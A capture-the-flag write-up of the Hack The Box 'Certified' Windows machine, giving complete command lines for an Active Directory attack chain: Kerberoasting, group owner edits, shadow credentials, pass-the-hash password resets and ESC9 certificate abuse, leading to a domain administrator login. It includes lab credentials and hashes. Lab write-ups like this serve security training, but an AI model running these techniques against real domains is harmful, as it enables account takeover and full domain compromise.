CertifiedMarch 15, 2025 Created by Page Difficulty OS ruycr4ft Hack The Box Medium Windows I start with a scan of the open ports and I continue with a scan of the versions and technologies that are running on the open ports that we have found nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.41 -oG scan nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49666,49668,49673,49674,49683,49713,49737,49770 -sCV -Pn 10.10.11.41 -oN ports I have access via smb to the IPC$ folder and thanks to that I am able to enumerate the system netexec smb 10.10.11.41 -u judith.mader -p judith09 --shares netexec ldap 10.10.11.41 -u judith.mader -p judith09 --bloodhound --collection All --dns-server 10.10.11.41 Before analyzing with bloodhound, I see on which user I can request a TGS as I have valid credentials. rdate -n 10.10.11.41; impacket-GetUserSPNs certified.htb/judith.mader:judith09 -request I can request it from the management_SVC user and sometimes I can break it and get his password. After completing the whole machine I understand why I can sometimes break the TGS and sometimes not. As this is not the intended way to complete the machine I am not going to follow up on this point Analyzing with bloodhound I see that I have “WriteOwner” permission on the management group and then it has “GenericWrite” permission on the management_svc user. Thanks to the first one I can change the owner of the object and with the second one I can change the user’s password without knowing the current one. I start by adding the user judith.mader to the management group with owneredit from impacket owneredit.py -action write -new-owner 'judith.mader' -target-dn 'CN=management,CN=Users,DC=certified,DC=htb' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41 With this I get the user’s ticket but I am not able to get his password in clear text. rdate -n 10.10.11.41; ./targetedKerberoast.py --dc-ip '10.10.11.41' -v -d 'certified.htb' -u 'judith.mader' -p 'judith09' By observing that judith has “Owns” and “WriteOwner” permissions on the group managements, and this group has “GenericWrite” permission on the user Management_svc. We can first become a member of the group and get the user’s hash. This is known as Kerberos PKINIT. pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add" --filename test1 #request a Ticket-Granting-Ticket (TGT) for the domain controller ./gettgtpkini.py -cert-pfx test1.pfx -pfx-pass 4l99njREI8ehV7aLoA7a certified.htb/Management_svc Management_svc.ccache #set the KRB5CCNAME environment variable, export KRB5CCNAME=Management_svc.ccache #Using the tool `getnthash.py` from PKINITtools we could request the NT hash for our target host/user by using Kerberos U2U to submit a TGS request with the [Privileged Attribute Certificate (PAC)]which contains the NT hash for the target. This can be decrypted with the AS-REP encryption key we obtained when requesting the TGT earlier. rdate -n 10.10.11.41; ./getnthash.py -key d85b3ba5fcb9c40d666dd6c4d7413c9273276f039ea2342d32dff2723ad291a1 certified.htb/Management_svc Having already the hash of the user management_svc, I comment myself on WinRM and I manage to read the first flag. evil-winrm -i 10.10.11.41 -u Management_svc -H a091XXXXXXXXXXXXXXXXXX584 Having the credentials of this user, we can move laterally to the ca_operatos user by changing its password. By having “GenerilcAll” permission on the user ca_operator, I can set the user’s password without knowing the current password. pth-net rpc password "ca_operator" "newP@ssword2022" -U certified.htb/management_svc%"a091c1832bcdd4677c28b5a6a1295584":"a091c1832bcdd4677c28b5a6a1295584" -S dc01.certified.htb crackmapexec smb 10.10.11.41 -u 'ca_operator' -p 'newP@ssword2022' With these credentials we enumerate the system in order to add the certificate part to bloodhound. rdate -n 10.10.11.41; certipy-ad req -u ca_operator@certified.htb -p newP@ssword2022 -dc-ip 10.10.11.41 -ca certified-DC01-CA -target certified.htb -template User crackpkcs12 -d /usr/share/wordlists/rockyou.txt ca_operator.pfx -t 25 #Downlaod the fork version of bloodhound rdate -n 10.10.11.41; certipy-ad find -u ca_operator@certified.htb -p newP@ssword2022 -dc-ip 10.10.11.41 -old-bloodhound With the certipy tool I search for any vulnerability in the certificate. It tells me that it may be vulnerable to ESC9 With the “find” option you can list AD CS certificate templates, certificate authorities and other settings certipy-ad find -u ca_operator -p 'newP@ssword2022' -dc-ip 10.10.11.41 -stdout -enabled -vulnerable To exploit this vulnerability I get help from this page that tells me the steps to execute. rdate -n 10.10.11.41; certipy-ad shadow auto -username "management_svc@certified.htb" -hashes "a091c1832bcdd4677c28b5a6a1295584" -account ca_operator certipy-ad account update -username "management_svc@certified.htb" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user ca_operator -upn administrator certipy-ad req -username "ca_operator@certified.htb" -hashes "01794af19fd00af4f2528923c4ef08be" -target "certified.htb" -ca 'certified-DC01-CA' -template 'CertifiedAuthentication' certipy-ad account update -username "management_svc@certified.htb" -hashes "a091c1832bcdd4677c28b5a6a1295584" -user ca_operator -upn "ca_operator@certified.htb" rdate -n 10.10.11.41; certipy-ad auth -pfx ca_operator.pfx -domain certified.htb After validating and confirming that the ntlm hash is correct for the administrator user, I connect to the system and get to read the second flag evil-winrm -i 10.10.11.41 -u administrator -H "0d5bXXXXXXXXXXXXXXXXXX2d34"